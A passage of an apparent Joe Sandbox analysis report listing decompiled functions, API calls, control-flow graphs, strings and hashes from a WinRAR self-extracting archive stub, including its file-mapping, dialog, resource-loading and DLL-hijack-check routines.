                                                • Part of subcall function 00CAF4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CAF524
                                                • Part of subcall function 00CAF4D4: SHGetMalloc.SHELL32(00CE532C), ref: 00CAF52E
                                              • GetCommandLineW.KERNEL32 ref: 00CB4608
                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 00CB464F
                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00CB4661
                                              • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00CB466F
                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 00CB467D
                                                • Part of subcall function 00CAFC38: __EH_prolog3.LIBCMT ref: 00CAFC3F
                                                • Part of subcall function 00CB3EFC: __EH_prolog3_GS.LIBCMT ref: 00CB3F03
                                                • Part of subcall function 00CB3EFC: SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00CB3F1B
                                                • Part of subcall function 00CB3EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00CB3F86
                                                • Part of subcall function 00CA51BF: _wcslen.LIBCMT ref: 00CA51E3
                                              • UnmapViewOfFile.KERNEL32(00000000,00CE5430,00000400,00CE5430,00CE5430,00000400,00000000,00000001,?,00000000), ref: 00CB46CC
                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CB46D3
                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00CD9698,00000000), ref: 00CB472F
                                              • GetLocalTime.KERNEL32(?), ref: 00CB473A
                                              • _swprintf.LIBCMT ref: 00CB4779
                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CB478E
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00CB4795
                                              • LoadIconW.USER32(00000000,00000064), ref: 00CB47AC
                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00CB4803
                                              • Sleep.KERNELBASE(00001B58), ref: 00CB4834
                                              • DeleteObject.GDI32 ref: 00CB4858
                                              • DeleteObject.GDI32(01050E65), ref: 00CB4868
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                                • Part of subcall function 00CB19EE: __EH_prolog3_GS.LIBCMT ref: 00CB19F5
                                              • CloseHandle.KERNEL32 ref: 00CB48AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                              • API String ID: 3142445277-3710569615
                                              • Opcode ID: 2e94855de874eb68c61b9412d2ee5867965ac56e1e3d52fa38c43b7e98c065ba
                                              • Instruction ID: 28f0271023c8f8924eed1e96a6d1165d43daa9fc3bd8329d8710ba3ade6c5a50
                                              • Opcode Fuzzy Hash: 2e94855de874eb68c61b9412d2ee5867965ac56e1e3d52fa38c43b7e98c065ba
                                              • Instruction Fuzzy Hash: 0091F0B0508380AFC724EF61DC85FAFB7E8EB49708F40092DF949D61A2EB749904DB21
                                              Function 00CAEBD3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 608 caebd3-caebf0 FindResourceW 609 caecec 608->609 610 caebf6-caec07 SizeofResource 608->610 612 caecee-caecf2 609->612 610->609 611 caec0d-caec1c LoadResource 610->611 611->609 613 caec22-caec2d LockResource 611->613 613->609 614 caec33-caec48 GlobalAlloc 613->614 615 caec4e-caec57 GlobalLock 614->615 616 caece4-caecea 614->616 617 caecdd-caecde GlobalFree 615->617 618 caec5d-caec7b call cb6c70 CreateStreamOnHGlobal 615->618 616->612 617->616 621 caec7d-caec9f call caeb06 618->621 622 caecd6-caecd7 GlobalUnlock 618->622 621->622 627 caeca1-caeca9 621->627 622->617 628 caecab-caecbf GdipCreateHBITMAPFromBitmap 627->628 629 caecc4-caecd2 627->629 628->629 630 caecc1 628->630 629->622 630->629
                                              APIs
                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CB0845,00000066), ref: 00CAEBE6
                                              • SizeofResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEBFD
                                              • LoadResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEC14
                                              • LockResource.KERNEL32(00000000,?,?,?,00CB0845,00000066), ref: 00CAEC23
                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CB0845,00000066), ref: 00CAEC3E
                                              • GlobalLock.KERNEL32(00000000), ref: 00CAEC4F
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CAEC73
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00CAECD7
                                                • Part of subcall function 00CAEB06: GdipAlloc.GDIPLUS(00000010), ref: 00CAEB0C
                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CAECB8
                                              • GlobalFree.KERNEL32(00000000), ref: 00CAECDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                              • String ID: PNG
                                              • API String ID: 211097158-364855578
                                              • Opcode ID: 049706e05b0f0c8184abdd76e6d6b7bb829d68746636908ef9932ca64c34e1f1
                                              • Instruction ID: 23789b2c2ad057581f65e3c8a2917e2e548b9dc7fe941238e3735e2cc0f60c87
                                              • Opcode Fuzzy Hash: 049706e05b0f0c8184abdd76e6d6b7bb829d68746636908ef9932ca64c34e1f1
                                              • Instruction Fuzzy Hash: 44316F71600312AFD710AF62DD88F2FBFACFF85768B140529F919D2261EB31D801DAA0
                                              Function 00CA355D Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 753COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CA8781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,9CAA5719,00000007,?,?,?,00CA8751,?,?,?,?,0000000C,00C94426), ref: 00CA879D
                                              • _wcslen.LIBCMT ref: 00CA395A
                                              • __fprintf_l.LIBCMT ref: 00CA3AA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                              • API String ID: 1796436225-285229759
                                              • Opcode ID: 0f97daa0839d3b612974425d28c0000f2c6a27263ed6021e15dd9b885fb47af2
                                              • Instruction ID: a6a4fa30d87e6c5341db01a78c7d6750f20261836b51477e5e65ec20c678dad9
                                              • Opcode Fuzzy Hash: 0f97daa0839d3b612974425d28c0000f2c6a27263ed6021e15dd9b885fb47af2
                                              • Instruction Fuzzy Hash: CA52B67190029AABCF24DFA8CC95AEEB7B4FF05718F14052AF415E7281EB719B45CB50
                                              Function 00C9F826 Relevance: 9.1, APIs: 6, Instructions: 139fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1006 c9f826-c9f841 call cb57d8 1009 c9f925-c9f935 FindNextFileW 1006->1009 1010 c9f847-c9f84d 1006->1010 1011 c9f948-c9f9fa call c925c3 call c914a7 call ca229d call c91a66 call ca7c44 * 3 1009->1011 1012 c9f937-c9f946 GetLastError 1009->1012 1013 c9f84f 1010->1013 1014 c9f851-c9f864 FindFirstFileW 1010->1014 1019 c9f9ff-c9fa0a call cb5787 1011->1019 1016 c9f91d-c9f920 1012->1016 1013->1014 1014->1011 1015 c9f86a-c9f88e call ca169a 1014->1015 1024 c9f8ac-c9f8b6 1015->1024 1025 c9f890-c9f897 1015->1025 1016->1019 1030 c9f8b8-c9f8d3 1024->1030 1031 c9f8fd-c9f900 1024->1031 1028 c9f899 1025->1028 1029 c9f89c-c9f8aa FindFirstFileW 1025->1029 1028->1029 1029->1024 1033 c9f8d5-c9f8ee call c919a9 1030->1033 1034 c9f8f4-c9f8fc call cb5726 1030->1034 1031->1011 1036 c9f902-c9f90b GetLastError 1031->1036 1033->1034 1034->1031 1037 c9f91b 1036->1037 1038 c9f90d-c9f910 1036->1038 1037->1016 1038->1037 1042 c9f912-c9f915 1038->1042 1042->1037 1047 c9f917-c9f919 1042->1047 1047->1016
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9F830
                                              • FindFirstFileW.KERNELBASE(?,?,00000274,00C9F733,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?), ref: 00C9F859
                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9F8A4
                                              • GetLastError.KERNEL32(?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049,?,00000000), ref: 00C9F902
                                              • FindNextFileW.KERNEL32(?,?,00000274,00C9F733,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?), ref: 00C9F92D
                                              • GetLastError.KERNEL32(?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049,?,00000000), ref: 00C9F93A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                              • String ID:
                                              • API String ID: 3831798110-0
                                              • Opcode ID: a220985be4a48d68c5be232cd12a50e091e939b8349053556bc40b46b71dcdab
                                              • Instruction ID: ac775dcaa282f71fd484260c6d5f98512697986178955a6527d9e4c1dd820ad8
                                              • Opcode Fuzzy Hash: a220985be4a48d68c5be232cd12a50e091e939b8349053556bc40b46b71dcdab
                                              • Instruction Fuzzy Hash: 40510D71904619EFCF54DF64C889AEDB7B4BB09324F1402AAE429E3290DB30AB95DF50
                                              Function 00C9BF3D Relevance: 5.0, APIs: 1, Strings: 1, Instructions: 1497COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00C9C342
                                                • Part of subcall function 00CA2095: __EH_prolog3_GS.LIBCMT ref: 00CA209C
                                                • Part of subcall function 00C957C0: __EH_prolog3.LIBCMT ref: 00C957C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3H_prolog3__wcslen
                                              • String ID: __tmp_reference_source_
                                              • API String ID: 1523997010-685763994
                                              • Opcode ID: 1a16766b55931fce35c9364215f57f725e2b08411e434c2e76cb7be1b772f2e4
                                              • Instruction ID: b5597d045705ae7c27be3a769d8b4777b6143c7de497a54dc812f46da3360bde
                                              • Opcode Fuzzy Hash: 1a16766b55931fce35c9364215f57f725e2b08411e434c2e76cb7be1b772f2e4
                                              • Instruction Fuzzy Hash: 0AD209719046899FDF29DFB4C899BFEBBB4BF05304F04011EE4AAA7241DB34AA45DB50
                                              Function 00CBECAA Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,?,00CBEC80,00000000,00CD6F40,0000000C,00CBEDD7,00000000,00000002,00000000), ref: 00CBECCB
                                              • TerminateProcess.KERNEL32(00000000,?,00CBEC80,00000000,00CD6F40,0000000C,00CBEDD7,00000000,00000002,00000000), ref: 00CBECD2
                                              • ExitProcess.KERNEL32 ref: 00CBECE4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 5288e25f62bc4dbb187da3bda56ed9634bf21688de91bd17d470ee7542fc38e1
                                              • Instruction ID: fc4befa3f42bbab035f89cf157a045810175e0486744d48c0460410387069501
                                              • Opcode Fuzzy Hash: 5288e25f62bc4dbb187da3bda56ed9634bf21688de91bd17d470ee7542fc38e1
                                              • Instruction Fuzzy Hash: BFE0B632000618AFCF126F65DE49F9C3F69EF51781F044464FD599A522CB36ED42EB40
                                              Function 00CAB76F Relevance: .4, Instructions: 353COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID:
                                              • API String ID: 431132790-0
                                              • Opcode ID: 795a252bc31a7d9a3f13ac77851b1932b4717dd39b479a8bc92464d7a2eb5d7c
                                              • Instruction ID: 21e44bf82a0bcb7d42004ebfb21600e7ec6a65d5eac08b47fadc90840520d51e
                                              • Opcode Fuzzy Hash: 795a252bc31a7d9a3f13ac77851b1932b4717dd39b479a8bc92464d7a2eb5d7c
                                              • Instruction Fuzzy Hash: C5E1A3715043468FDB24CF28C984B9BBBE1BF8A308F04456DE8999B342D774EE45CB52
                                              Function 00CB0900 Relevance: 88.4, APIs: 43, Strings: 7, Instructions: 935windowfilesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00CB090A
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • EndDialog.USER32(?,00000000), ref: 00CB0A18
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB0A57
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB0A71
                                              • IsDialogMessageW.USER32(?,?), ref: 00CB0A84
                                              • TranslateMessage.USER32(?), ref: 00CB0A92
                                              • DispatchMessageW.USER32(?), ref: 00CB0A9C
                                              • EndDialog.USER32(?,00000001), ref: 00CB0ADE
                                              • GetDlgItem.USER32(?,00000068), ref: 00CB0B04
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CB0B1F
                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CCC6C8), ref: 00CB0B32
                                              • SetFocus.USER32(00000000), ref: 00CB0B39
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CB0C20
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CB0C4C
                                              • GetTickCount.KERNEL32 ref: 00CB0C79
                                              • GetLastError.KERNEL32(?,00000011), ref: 00CB0CD5
                                              • GetCommandLineW.KERNEL32 ref: 00CB0DF9
                                              • _wcslen.LIBCMT ref: 00CB0E06
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00CE5430,00000400,00000001,00000001), ref: 00CB0E85
                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00CB0EA3
                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00CB0EDC
                                              • WaitForInputIdle.USER32(?,00002710), ref: 00CB0F0B
                                              • Sleep.KERNEL32(00000064), ref: 00CB0F25
                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00CE5430,00000400), ref: 00CB0F61
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00CE5430,00000400), ref: 00CB0F6D
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB1072
                                                • Part of subcall function 00C91E1F: GetDlgItem.USER32(?,?), ref: 00C91E34
                                                • Part of subcall function 00C91E1F: ShowWindow.USER32(00000000), ref: 00C91E3B
                                              • SetDlgItemTextW.USER32(?,00000065,00CCC6C8), ref: 00CB108A
                                              • GetDlgItem.USER32(?,00000065), ref: 00CB1093
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB10A2
                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00CB1422
                                              • EndDialog.USER32(?,00000001), ref: 00CB1436
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CB10B1
                                                • Part of subcall function 00CAE265: __EH_prolog3_GS.LIBCMT ref: 00CAE26C
                                                • Part of subcall function 00CAE265: ShowWindow.USER32(?,00000000,00000038), ref: 00CAE294
                                                • Part of subcall function 00CAE265: GetWindowRect.USER32(?,?), ref: 00CAE2D8
                                                • Part of subcall function 00CAE265: ShowWindow.USER32(?,00000005,?,00000000), ref: 00CAE373
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB114F
                                              • SendMessageW.USER32(?,00000080,00000001,00040449), ref: 00CB1284
                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,01050E65), ref: 00CB129D
                                              • GetDlgItem.USER32(?,00000068), ref: 00CB12A6
                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CB12BE
                                              • GetDlgItem.USER32(?,00000066), ref: 00CB12E6
                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CB135D
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB1371
                                              • EnableWindow.USER32(?,00000000), ref: 00CB15A7
                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CB15E8
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CB160D
                                                • Part of subcall function 00CB1D4F: __EH_prolog3_GS.LIBCMT ref: 00CB1D59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                              • String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                                              • API String ID: 3616063595-3000381960
                                              • Opcode ID: 7efc238786d93cb285ffaeaa4d599bba486e250a0971622a592e3474957104ef
                                              • Instruction ID: 9a22f858a93d35facd9cb92d24ff1f0c9601d3c07a3d622f92ecab140e501e1e
                                              • Opcode Fuzzy Hash: 7efc238786d93cb285ffaeaa4d599bba486e250a0971622a592e3474957104ef
                                              • Instruction Fuzzy Hash: 9B72C570940388AEEF21EBA4DC89FEE7BB8AB01304F544159F505BB1E2DBB45E45DB21
                                              Function 00CA6D7B Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 394libraryfileloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 379 ca6d7b-ca6dd1 call cb5b20 GetModuleHandleW 382 ca6e28-ca708c 379->382 383 ca6dd3-ca6de3 GetProcAddress 379->383 384 ca719b 382->384 385 ca7092-ca709d call cbe50e 382->385 386 ca6dfd-ca6e0d GetProcAddress 383->386 387 ca6de5-ca6dfb 383->387 390 ca719d-ca71be call ca13f9 call ca2117 384->390 385->384 395 ca70a3-ca70b8 call ca13f9 385->395 386->382 389 ca6e0f-ca6e24 386->389 387->386 389->382 402 ca71c0-ca71cc call ca067e 390->402 403 ca70ba 395->403 404 ca70bd-ca70d5 CreateFileW 395->404 411 ca71ce-ca71dc call ca6c5e 402->411 412 ca7203-ca7234 call c914a7 call ca229d call c91a66 call c9ed1f 402->412 403->404 406 ca70db-ca70e7 SetFilePointer 404->406 407 ca7186-ca7199 CloseHandle call c91a66 404->407 406->407 409 ca70ed-ca7107 ReadFile 406->409 407->390 409->407 413 ca7109-ca7114 409->413 411->412 424 ca71de-ca7201 CompareStringW 411->424 443 ca7239-ca723c 412->443 417 ca711a-ca714d call c914a7 413->417 418 ca73f2-ca73f7 call cb5ce1 413->418 427 ca7161-ca7174 call ca6366 417->427 424->412 428 ca723e-ca7242 424->428 437 ca714f-ca7156 427->437 438 ca7176-ca7181 call c91a66 * 2 427->438 428->402 432 ca7248 428->432 435 ca724c-ca7250 432->435 439 ca7252 435->439 440 ca7296-ca7298 435->440 441 ca715b-ca715c call ca6c5e 437->441 442 ca7158 437->442 438->407 447 ca7254-ca728a call c914a7 call ca229d call c91a66 call c9ed1f 439->447 444 ca729e-ca72b1 call ca2187 call ca067e 440->444 445 ca73bd-ca73ef call c91a66 * 2 call cb5734 440->445 441->427 442->441 443->428 449 ca724a 443->449 464 ca7332-ca7366 call ca6a25 AllocConsole 444->464 465 ca72b3-ca7330 call ca6c5e * 2 call ca4318 call ca6a25 call ca4318 call c914a7 call caecf5 call c91549 444->465 480 ca728c-ca7290 447->480 481 ca7294 447->481 449->435 477 ca7368-ca73a7 GetCurrentProcessId AttachConsole call ca7441 call ca7436 GetStdHandle WriteConsoleW Sleep FreeConsole 464->477 478 ca73ad 464->478 482 ca73b0-ca73b7 call c91549 ExitProcess 465->482 477->478 478->482 480->447 486 ca7292 480->486 481->440 486->440
                                              APIs
                                              • GetModuleHandleW.KERNEL32(kernel32,9CAA5719), ref: 00CA6DC7
                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CA6DD9
                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CA6E03
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA70CA
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CA70DF
                                              • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00CA70FF
                                              • CloseHandle.KERNEL32(00000000), ref: 00CA7187
                                              • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 00CA71F8
                                              • AllocConsole.KERNEL32 ref: 00CA735E
                                              • GetCurrentProcessId.KERNEL32 ref: 00CA7368
                                              • AttachConsole.KERNEL32(00000000), ref: 00CA736F
                                              • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 00CA738F
                                              • WriteConsoleW.KERNEL32(00000000), ref: 00CA7396
                                              • Sleep.KERNEL32(00002710), ref: 00CA73A1
                                              • FreeConsole.KERNEL32 ref: 00CA73A7
                                              • ExitProcess.KERNEL32 ref: 00CA73B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                              • API String ID: 2644799563-3298887752
                                              • Opcode ID: d3899fa8a68d003ce9ec7adc7b3f0bcf93a7dec0773026d1a3df1520336a3860
